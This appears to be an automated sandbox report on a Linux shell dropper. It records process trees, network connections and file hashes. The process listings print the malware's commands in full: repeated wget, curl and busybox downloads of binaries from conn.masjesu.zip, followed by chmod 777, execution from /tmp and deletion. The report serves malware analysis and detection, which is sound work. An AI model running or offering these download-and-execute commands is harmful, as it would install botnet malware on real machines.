[/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]
/bin/chmod
[chmod 777 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]
/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE
[./cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]
/bin/rm
[rm cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]
/bin/chmod
[chmod 777 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]
/tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ
[./cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]
/bin/rm
[rm cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]
/bin/chmod
[chmod 777 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]
/tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K
[./mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]
/bin/rm
[rm mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]
/bin/chmod
[chmod 777 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]
/tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8
[./4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]
/bin/rm
[rm 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]
/bin/chmod
[chmod 777 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]
/tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce
[./LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]
/bin/rm
[rm LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]
/bin/chmod
[chmod 777 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]
/tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl
[./ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]
/bin/rm
[rm ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]
/bin/chmod
[chmod 777 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]
/tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ
[./fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]
/bin/rm
[rm fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]
/bin/chmod
[chmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]
/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2
[./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]
/bin/rm
[rm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]
/bin/chmod
[chmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]
/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa
[./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]
/bin/rm
[rm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]
/bin/chmod
[chmod 777 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]
/tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI
[./ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]
/bin/rm
[rm ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]
/bin/chmod
[chmod 777 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]
/tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0
[./dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]
/bin/rm
[rm dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]
/bin/chmod
[chmod 777 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]
/tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr
[./Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]
/bin/rm
[rm Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]
/bin/chmod
[chmod 777 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]
/tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs
[./lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]
/bin/rm
[rm lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]
/bin/chmod
[chmod 777 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]
/tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2
[./VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]
/bin/rm
[rm VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]
/bin/chmod
[chmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]
/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2
[./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]
/bin/rm
[rm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]
/bin/chmod
[chmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]
/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa
[./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]
/bin/rm
[rm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]
/bin/chmod
[chmod 777 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]
/tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI
[./ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]
/bin/rm
[rm ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]
/bin/chmod
[chmod 777 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]
/tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ
[./fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]
/bin/rm
[rm fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
/tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0
| MD5 | e1732e70f015e99d14dff1eeeaec9966 |
| SHA1 | c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113 |
| SHA256 | 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e |
| SHA512 | 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-21 01:37
Reported
2024-10-21 01:39
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
148s
Max time network
132s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh
[/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 151.101.193.91:443 | tcp | |
| GB | 195.181.164.14:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.61:443 | tcp |